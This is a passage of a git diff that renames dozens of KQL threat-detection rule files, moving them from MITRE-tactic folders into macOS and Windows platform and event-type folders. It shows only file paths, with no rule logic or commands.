b/KQL/rules/macos/process_creation/jamf_mdm_execution.kql similarity index 100% rename from KQL/rules/Execution/jamf_mdm_execution.kql rename to KQL/rules/macos/process_creation/jamf_mdm_execution.kql diff --git a/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql b/KQL/rules/macos/process_creation/jamf_mdm_potential_suspicious_child_process.kql similarity index 100% rename from KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql rename to KQL/rules/macos/process_creation/jamf_mdm_potential_suspicious_child_process.kql diff --git a/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql b/KQL/rules/macos/process_creation/jxa_in_memory_execution_via_osascript.kql similarity index 100% rename from KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql rename to KQL/rules/macos/process_creation/jxa_in_memory_execution_via_osascript.kql diff --git a/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql b/KQL/rules/macos/process_creation/launch_agent_daemon_execution_via_launchctl.kql similarity index 100% rename from KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql rename to KQL/rules/macos/process_creation/launch_agent_daemon_execution_via_launchctl.kql diff --git a/KQL/rules/Discovery/local_groups_discovery_macos.kql b/KQL/rules/macos/process_creation/local_groups_discovery_macos.kql similarity index 100% rename from KQL/rules/Discovery/local_groups_discovery_macos.kql rename to KQL/rules/macos/process_creation/local_groups_discovery_macos.kql diff --git a/KQL/rules/Discovery/local_system_accounts_discovery_macos.kql b/KQL/rules/macos/process_creation/local_system_accounts_discovery_macos.kql similarity index 100% rename from KQL/rules/Discovery/local_system_accounts_discovery_macos.kql rename to KQL/rules/macos/process_creation/local_system_accounts_discovery_macos.kql diff --git a/KQL/rules/Discovery/macos_network_service_scanning.kql b/KQL/rules/macos/process_creation/macos_network_service_scanning.kql similarity index 100% rename from KQL/rules/Discovery/macos_network_service_scanning.kql rename to KQL/rules/macos/process_creation/macos_network_service_scanning.kql diff --git a/KQL/rules/Discovery/macos_remote_system_discovery.kql b/KQL/rules/macos/process_creation/macos_remote_system_discovery.kql similarity index 100% rename from KQL/rules/Discovery/macos_remote_system_discovery.kql rename to KQL/rules/macos/process_creation/macos_remote_system_discovery.kql diff --git a/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql b/KQL/rules/macos/process_creation/macos_scripting_interpreter_applescript.kql similarity index 100% rename from KQL/rules/Execution/macos_scripting_interpreter_applescript.kql rename to KQL/rules/macos/process_creation/macos_scripting_interpreter_applescript.kql diff --git a/KQL/rules/Discovery/network_sniffing_macos.kql b/KQL/rules/macos/process_creation/network_sniffing_macos.kql similarity index 100% rename from KQL/rules/Discovery/network_sniffing_macos.kql rename to KQL/rules/macos/process_creation/network_sniffing_macos.kql diff --git a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql similarity index 100% rename from KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql rename to KQL/rules/macos/process_creation/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql diff --git a/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql b/KQL/rules/macos/process_creation/osacompile_execution_by_potentially_suspicious_applet_osascript.kql similarity index 100% rename from KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql rename to KQL/rules/macos/process_creation/osacompile_execution_by_potentially_suspicious_applet_osascript.kql diff --git a/KQL/rules/Execution/osacompile_run_only_execution.kql b/KQL/rules/macos/process_creation/osacompile_run_only_execution.kql similarity index 100% rename from KQL/rules/Execution/osacompile_run_only_execution.kql rename to KQL/rules/macos/process_creation/osacompile_run_only_execution.kql diff --git a/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql b/KQL/rules/macos/process_creation/payload_decoded_and_decrypted_via_built_in_utilities.kql similarity index 100% rename from KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql rename to KQL/rules/macos/process_creation/payload_decoded_and_decrypted_via_built_in_utilities.kql diff --git a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql b/KQL/rules/macos/process_creation/potential_base64_decoded_from_images.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql rename to KQL/rules/macos/process_creation/potential_base64_decoded_from_images.kql diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql b/KQL/rules/macos/process_creation/potential_discovery_activity_using_find_macos.kql similarity index 100% rename from KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql rename to KQL/rules/macos/process_creation/potential_discovery_activity_using_find_macos.kql diff --git a/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql b/KQL/rules/macos/process_creation/potential_in_memory_download_and_compile_of_payloads.kql similarity index 100% rename from KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql rename to KQL/rules/macos/process_creation/potential_in_memory_download_and_compile_of_payloads.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql b/KQL/rules/macos/process_creation/potential_persistence_via_plistbuddy.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql rename to KQL/rules/macos/process_creation/potential_persistence_via_plistbuddy.kql diff --git a/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql b/KQL/rules/macos/process_creation/potential_wizardupdate_malware_infection.kql similarity index 100% rename from KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql rename to KQL/rules/macos/process_creation/potential_wizardupdate_malware_infection.kql diff --git a/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql b/KQL/rules/macos/process_creation/potential_xcsset_malware_infection.kql similarity index 100% rename from KQL/rules/Command and Control/potential_xcsset_malware_infection.kql rename to KQL/rules/macos/process_creation/potential_xcsset_malware_infection.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql b/KQL/rules/macos/process_creation/remote_access_tool_potential_meshagent_execution_macos.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql rename to KQL/rules/macos/process_creation/remote_access_tool_potential_meshagent_execution_macos.kql diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql b/KQL/rules/macos/process_creation/remote_access_tool_renamed_meshagent_execution_macos.kql similarity index 100% rename from KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql rename to KQL/rules/macos/process_creation/remote_access_tool_renamed_meshagent_execution_macos.kql diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql b/KQL/rules/macos/process_creation/remote_access_tool_team_viewer_session_started_on_macos_host.kql similarity index 100% rename from KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql rename to KQL/rules/macos/process_creation/remote_access_tool_team_viewer_session_started_on_macos_host.kql diff --git a/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql b/KQL/rules/macos/process_creation/root_account_enable_via_dsenableroot.kql similarity index 100% rename from KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql rename to KQL/rules/macos/process_creation/root_account_enable_via_dsenableroot.kql diff --git a/KQL/rules/Execution/scheduled_cron_task_job_macos.kql b/KQL/rules/macos/process_creation/scheduled_cron_task_job_macos.kql similarity index 100% rename from KQL/rules/Execution/scheduled_cron_task_job_macos.kql rename to KQL/rules/macos/process_creation/scheduled_cron_task_job_macos.kql diff --git a/KQL/rules/Collection/screen_capture_macos.kql b/KQL/rules/macos/process_creation/screen_capture_macos.kql similarity index 100% rename from KQL/rules/Collection/screen_capture_macos.kql rename to KQL/rules/macos/process_creation/screen_capture_macos.kql diff --git a/KQL/rules/Discovery/security_software_discovery_macos.kql b/KQL/rules/macos/process_creation/security_software_discovery_macos.kql similarity index 100% rename from KQL/rules/Discovery/security_software_discovery_macos.kql rename to KQL/rules/macos/process_creation/security_software_discovery_macos.kql diff --git a/KQL/rules/Defense Evasion/space_after_filename_macos.kql b/KQL/rules/macos/process_creation/space_after_filename_macos.kql similarity index 100% rename from KQL/rules/Defense Evasion/space_after_filename_macos.kql rename to KQL/rules/macos/process_creation/space_after_filename_macos.kql diff --git a/KQL/rules/Exfiltration/split_a_file_into_pieces.kql b/KQL/rules/macos/process_creation/split_a_file_into_pieces.kql similarity index 100% rename from KQL/rules/Exfiltration/split_a_file_into_pieces.kql rename to KQL/rules/macos/process_creation/split_a_file_into_pieces.kql diff --git a/KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql b/KQL/rules/macos/process_creation/suspicious_browser_child_process_macos.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql rename to KQL/rules/macos/process_creation/suspicious_browser_child_process_macos.kql diff --git a/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql b/KQL/rules/macos/process_creation/suspicious_execution_via_macos_script_editor.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql rename to KQL/rules/macos/process_creation/suspicious_execution_via_macos_script_editor.kql diff --git a/KQL/rules/Credential Access/suspicious_history_file_operations.kql b/KQL/rules/macos/process_creation/suspicious_history_file_operations.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_history_file_operations.kql rename to KQL/rules/macos/process_creation/suspicious_history_file_operations.kql diff --git a/KQL/rules/Execution/suspicious_installer_package_child_process.kql b/KQL/rules/macos/process_creation/suspicious_installer_package_child_process.kql similarity index 100% rename from KQL/rules/Execution/suspicious_installer_package_child_process.kql rename to KQL/rules/macos/process_creation/suspicious_installer_package_child_process.kql diff --git a/KQL/rules/Impact/suspicious_macos_firmware_activity.kql b/KQL/rules/macos/process_creation/suspicious_macos_firmware_activity.kql similarity index 100% rename from KQL/rules/Impact/suspicious_macos_firmware_activity.kql rename to KQL/rules/macos/process_creation/suspicious_macos_firmware_activity.kql diff --git a/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql b/KQL/rules/macos/process_creation/suspicious_microsoft_office_child_process_macos.kql similarity index 100% rename from KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql rename to KQL/rules/macos/process_creation/suspicious_microsoft_office_child_process_macos.kql diff --git a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_ioreg.kql similarity index 100% rename from KQL/rules/Discovery/system_information_discovery_using_ioreg.kql rename to KQL/rules/macos/process_creation/system_information_discovery_using_ioreg.kql diff --git a/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_sw_vers.kql similarity index 100% rename from KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql rename to KQL/rules/macos/process_creation/system_information_discovery_using_sw_vers.kql diff --git a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql b/KQL/rules/macos/process_creation/system_information_discovery_using_system_profiler.kql similarity index 100% rename from KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql rename to KQL/rules/macos/process_creation/system_information_discovery_using_system_profiler.kql diff --git a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql b/KQL/rules/macos/process_creation/system_information_discovery_via_sysctl_macos.kql similarity index 100% rename from KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql rename to KQL/rules/macos/process_creation/system_information_discovery_via_sysctl_macos.kql diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql b/KQL/rules/macos/process_creation/system_integrity_protection_sip_disabled.kql similarity index 100% rename from KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql rename to KQL/rules/macos/process_creation/system_integrity_protection_sip_disabled.kql diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql b/KQL/rules/macos/process_creation/system_integrity_protection_sip_enumeration.kql similarity index 100% rename from KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql rename to KQL/rules/macos/process_creation/system_integrity_protection_sip_enumeration.kql diff --git a/KQL/rules/Discovery/system_network_connections_discovery_macos.kql b/KQL/rules/macos/process_creation/system_network_connections_discovery_macos.kql similarity index 100% rename from KQL/rules/Discovery/system_network_connections_discovery_macos.kql rename to KQL/rules/macos/process_creation/system_network_connections_discovery_macos.kql diff --git a/KQL/rules/Discovery/system_network_discovery_macos.kql b/KQL/rules/macos/process_creation/system_network_discovery_macos.kql similarity index 100% rename from KQL/rules/Discovery/system_network_discovery_macos.kql rename to KQL/rules/macos/process_creation/system_network_discovery_macos.kql diff --git a/KQL/rules/Impact/system_shutdown_reboot_macos.kql b/KQL/rules/macos/process_creation/system_shutdown_reboot_macos.kql similarity index 100% rename from KQL/rules/Impact/system_shutdown_reboot_macos.kql rename to KQL/rules/macos/process_creation/system_shutdown_reboot_macos.kql diff --git a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/time_machine_backup_deletion_attempt_via_tmutil_macos.kql similarity index 100% rename from KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql rename to KQL/rules/macos/process_creation/time_machine_backup_deletion_attempt_via_tmutil_macos.kql diff --git a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql b/KQL/rules/macos/process_creation/time_machine_backup_disabled_via_tmutil_macos.kql similarity index 100% rename from KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql rename to KQL/rules/macos/process_creation/time_machine_backup_disabled_via_tmutil_macos.kql diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dscl.kql similarity index 100% rename from KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql rename to KQL/rules/macos/process_creation/user_added_to_admin_group_via_dscl.kql diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_dseditgroup.kql similarity index 100% rename from KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql rename to KQL/rules/macos/process_creation/user_added_to_admin_group_via_dseditgroup.kql diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql b/KQL/rules/macos/process_creation/user_added_to_admin_group_via_sysadminctl.kql similarity index 100% rename from KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql rename to KQL/rules/macos/process_creation/user_added_to_admin_group_via_sysadminctl.kql diff --git a/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql b/KQL/rules/windows/builtin/security/account_management/outgoing_logon_with_new_credentials.kql similarity index 100% rename from KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql rename to KQL/rules/windows/builtin/security/account_management/outgoing_logon_with_new_credentials.kql diff --git a/KQL/rules/Execution/successful_account_login_via_wmi.kql b/KQL/rules/windows/builtin/security/account_management/successful_account_login_via_wmi.kql similarity index 100% rename from KQL/rules/Execution/successful_account_login_via_wmi.kql rename to KQL/rules/windows/builtin/security/account_management/successful_account_login_via_wmi.kql diff --git a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql b/KQL/rules/windows/builtin/security/azure_ad_health_monitoring_agent_registry_keys_access.kql similarity index 100% rename from KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql rename to KQL/rules/windows/builtin/security/azure_ad_health_monitoring_agent_registry_keys_access.kql diff --git a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql b/KQL/rules/windows/builtin/security/azure_ad_health_service_agents_registry_keys_access.kql similarity index 100% rename from KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql rename to KQL/rules/windows/builtin/security/azure_ad_health_service_agents_registry_keys_access.kql diff --git a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql b/KQL/rules/windows/builtin/security/file_access_of_signal_desktop_sensitive_data.kql similarity index 100% rename from KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql rename to KQL/rules/windows/builtin/security/file_access_of_signal_desktop_sensitive_data.kql diff --git a/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql b/KQL/rules/windows/builtin/security/potential_secure_deletion_with_sdelete.kql similarity index 100% rename from KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql rename to KQL/rules/windows/builtin/security/potential_secure_deletion_with_sdelete.kql diff --git a/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql b/KQL/rules/windows/builtin/security/processes_accessing_the_microphone_and_webcam.kql similarity index 100% rename from KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql rename to KQL/rules/windows/builtin/security/processes_accessing_the_microphone_and_webcam.kql diff --git a/KQL/rules/Discovery/sam_registry_hive_handle_request.kql b/KQL/rules/windows/builtin/security/sam_registry_hive_handle_request.kql similarity index 100% rename from KQL/rules/Discovery/sam_registry_hive_handle_request.kql rename to KQL/rules/windows/builtin/security/sam_registry_hive_handle_request.kql diff --git a/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql b/KQL/rules/windows/builtin/security/suspicious_teams_application_related_objectacess_event.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql rename to KQL/rules/windows/builtin/security/suspicious_teams_application_related_objectacess_event.kql diff --git a/KQL/rules/Discovery/syskey_registry_keys_access.kql b/KQL/rules/windows/builtin/security/syskey_registry_keys_access.kql similarity index 100% rename from KQL/rules/Discovery/syskey_registry_keys_access.kql rename to KQL/rules/windows/builtin/security/syskey_registry_keys_access.kql diff --git a/KQL/rules/Credential Access/wce_wceaux_dll_access.kql b/KQL/rules/windows/builtin/security/wce_wceaux_dll_access.kql similarity index 100% rename from KQL/rules/Credential Access/wce_wceaux_dll_access.kql rename to KQL/rules/windows/builtin/security/wce_wceaux_dll_access.kql diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql b/KQL/rules/windows/builtin/security/windows_defender_exclusion_list_modified.kql similarity index 100% rename from KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql rename to KQL/rules/windows/builtin/security/windows_defender_exclusion_list_modified.kql diff --git a/KQL/rules/Persistence/wmi_persistence_security.kql b/KQL/rules/windows/builtin/security/wmi_persistence_security.kql similarity index 100% rename from KQL/rules/Persistence/wmi_persistence_security.kql rename to KQL/rules/windows/builtin/security/wmi_persistence_security.kql diff --git a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_crypto_currency_wallets_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/access_to_crypto_currency_wallets_by_uncommon_applications.kql diff --git a/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql diff --git a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_windows_credential_history_file_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/access_to_windows_credential_history_file_by_uncommon_applications.kql diff --git a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql diff --git a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/credential_manager_access_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/credential_manager_access_by_uncommon_applications.kql diff --git a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql similarity index 100% rename from KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql rename to KQL/rules/windows/file/file_access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql diff --git a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql b/KQL/rules/windows/file/file_access/suspicious_file_access_to_browser_credential_storage.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql rename to KQL/rules/windows/file/file_access/suspicious_file_access_to_browser_credential_storage.kql diff --git a/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql b/KQL/rules/windows/file/file_change/unusual_file_modification_by_dns_exe.kql similarity index 100% rename from KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql rename to KQL/rules/windows/file/file_change/unusual_file_modification_by_dns_exe.kql diff --git a/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql b/KQL/rules/windows/file/file_delete/ads_zone_identifier_deleted_by_uncommon_application.kql similarity index 100% rename from KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql rename to KQL/rules/windows/file/file_delete/ads_zone_identifier_deleted_by_uncommon_application.kql diff --git a/KQL/rules/Impact/backup_files_deleted.kql b/KQL/rules/windows/file/file_delete/backup_files_deleted.kql similarity index 100% rename from KQL/rules/Impact/backup_files_deleted.kql rename to KQL/rules/windows/file/file_delete/backup_files_deleted.kql diff --git a/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql b/KQL/rules/windows/file/file_delete/eventlog_evtx_file_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql rename to KQL/rules/windows/file/file_delete/eventlog_evtx_file_deleted.kql diff --git a/KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql b/KQL/rules/windows/file/file_delete/exchange_powershell_cmdlet_history_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/exchange_powershell_cmdlet_history_deleted.kql rename to KQL/rules/windows/file/file_delete/exchange_powershell_cmdlet_history_deleted.kql diff --git a/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql b/KQL/rules/windows/file/file_delete/file_deleted_via_sysinternals_sdelete.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql rename to KQL/rules/windows/file/file_delete/file_deleted_via_sysinternals_sdelete.kql diff --git a/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql b/KQL/rules/windows/file/file_delete/iis_webserver_access_logs_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql rename to KQL/rules/windows/file/file_delete/iis_webserver_access_logs_deleted.kql diff --git a/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql b/KQL/rules/windows/file/file_delete/powershell_console_history_logs_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql rename to KQL/rules/windows/file/file_delete/powershell_console_history_logs_deleted.kql diff --git a/KQL/rules/Defense Evasion/prefetch_file_deleted.kql b/KQL/rules/windows/file/file_delete/prefetch_file_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/prefetch_file_deleted.kql rename to KQL/rules/windows/file/file_delete/prefetch_file_deleted.kql diff --git a/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql b/KQL/rules/windows/file/file_delete/teamviewer_log_file_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql rename to KQL/rules/windows/file/file_delete/teamviewer_log_file_deleted.kql diff --git a/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql b/KQL/rules/windows/file/file_delete/tomcat_webserver_logs_deleted.kql similarity index 100% rename from KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql rename to KQL/rules/windows/file/file_delete/tomcat_webserver_logs_deleted.kql diff --git a/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql b/KQL/rules/windows/file/file_delete/unusual_file_deletion_by_dns_exe.kql similarity index 100% rename from KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql rename to KQL/rules/windows/file/file_delete/unusual_file_deletion_by_dns_exe.kql diff --git a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql b/KQL/rules/windows/file/file_event/_rdp_file_created_by_uncommon_application.kql similarity index 100% rename from KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql rename to KQL/rules/windows/file/file_event/_rdp_file_created_by_uncommon_application.kql diff --git a/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql b/KQL/rules/windows/file/file_event/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql similarity index 100% rename from KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql rename to KQL/rules/windows/file/file_event/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql diff --git a/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql b/KQL/rules/windows/file/file_event/adsi_cache_file_creation_by_uncommon_tool.kql similarity index 100% rename from KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql rename to KQL/rules/windows/file/file_event/adsi_cache_file_creation_by_uncommon_tool.kql diff --git a/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql b/KQL/rules/windows/file/file_event/advanced_ip_scanner_file_event.kql similarity index 100% rename from KQL/rules/Discovery/advanced_ip_scanner_file_event.kql rename to KQL/rules/windows/file/file_event/advanced_ip_scanner_file_event.kql diff --git a/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql b/KQL/rules/windows/file/file_event/adwind_rat_jrat_file_artifact.kql similarity index 100% rename from KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql rename to KQL/rules/windows/file/file_event/adwind_rat_jrat_file_artifact.kql diff --git a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql b/KQL/rules/windows/file/file_event/anydesk_temporary_artefact.kql similarity index 100% rename from KQL/rules/Command and Control/anydesk_temporary_artefact.kql rename to KQL/rules/windows/file/file_event/anydesk_temporary_artefact.kql diff --git a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql b/KQL/rules/windows/file/file_event/assembly_dll_creation_via_aspnetcompiler.kql similarity index 100% rename from KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql rename to KQL/rules/windows/file/file_event/assembly_dll_creation_via_aspnetcompiler.kql diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql b/KQL/rules/windows/file/file_event/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql rename to KQL/rules/windows/file/file_event/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql diff --git a/KQL/rules/Discovery/bloodhound_collection_files.kql b/KQL/rules/windows/file/file_event/bloodhound_collection_files.kql similarity index 100% rename from KQL/rules/Discovery/bloodhound_collection_files.kql rename to KQL/rules/windows/file/file_event/bloodhound_collection_files.kql diff --git a/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql b/KQL/rules/windows/file/file_event/created_files_by_microsoft_sync_center.kql similarity index 100% rename from KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql rename to KQL/rules/windows/file/file_event/created_files_by_microsoft_sync_center.kql diff --git a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql b/KQL/rules/windows/file/file_event/creation_exe_for_service_with_unquoted_path.kql similarity index 100% rename from KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql rename to KQL/rules/windows/file/file_event/creation_exe_for_service_with_unquoted_path.kql diff --git a/KQL/rules/Resource Development/creation_of_a_diagcab.kql b/KQL/rules/windows/file/file_event/creation_of_a_diagcab.kql similarity index 100% rename from KQL/rules/Resource Development/creation_of_a_diagcab.kql rename to KQL/rules/windows/file/file_event/creation_of_a_diagcab.kql diff --git a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql b/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql rename to KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql diff --git a/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql b/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql similarity index 100% rename from KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql rename to KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql diff --git a/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql b/KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql similarity index 69% rename from KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql rename to KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql index ea5eca48..5915c1ac 100644 --- a/KQL/rules/Credential 